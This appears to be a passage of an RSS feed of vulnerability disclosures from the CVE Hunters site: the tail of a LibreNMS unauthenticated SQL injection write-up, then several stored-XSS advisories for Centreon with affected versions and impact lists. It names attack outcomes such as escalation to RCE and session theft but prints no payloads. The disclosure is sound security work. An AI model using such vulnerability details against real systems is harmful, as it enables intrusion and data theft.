    &amp;lt;li&amp;gt;Observe that the response is altered: no device is found, and no discovery is triggered.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65093/image-1.png&amp;#34;
	width=&amp;#34;1496&amp;#34;
	height=&amp;#34;662&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65093/image-1_hu_fd11cdac0c88dc23.png 480w, /p/cve-2025-65093/image-1_hu_88de69507b3ff869.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;225&amp;#34;
		data-flex-basis=&amp;#34;542px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;The difference in output confirms that the injected Boolean logic is being executed by the database.&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 18 Nov 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54889</title>
        <link>https://www.cvehunters.com/p/cve-2025-54889/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-54889/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54889-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54889: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54889&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54889&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the SNMP traps manufacturer configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (SNMP traps manufacturer configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54889-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54889: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54889&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54889&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the SNMP traps manufacturer configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (SNMP traps manufacturer configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54889-centreon-web-all-versions-medium-severity-5123&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54889-centreon-web-all-versions-medium-severity-5123&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54891</title>
        <link>https://www.cvehunters.com/p/cve-2025-54891/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-54891/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54891-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54891: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54891&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54891&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the ACL Resource Access configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (ACL Resource access configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54891-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54891: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54891&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54891&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the ACL Resource Access configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (ACL Resource access configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54892</title>
        <link>https://www.cvehunters.com/p/cve-2025-54892/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-54892/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54892-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54892: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54892&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54892&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the SNMP traps group configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (SNMP traps group configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54892-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54892: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54892&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54892&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the SNMP traps group configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (SNMP traps group configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54892-centreon-web-all-versions-medium-severity-5121&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54892-centreon-web-all-versions-medium-severity-5121&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54893</title>
        <link>https://www.cvehunters.com/p/cve-2025-54893/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-54893/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54893-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54893: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54893&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54893&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Hosts templates configuration page&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (Commands Connectors configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54893-cross-site-scripting-xss-stored-in-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54893: Cross-Site Scripting (XSS) Stored in Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54893&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54893&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Hosts templates configuration page&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (Commands Connectors configuration modules) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.13, from 24.04.0 before 24.04.18, from 23.10.0 before 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
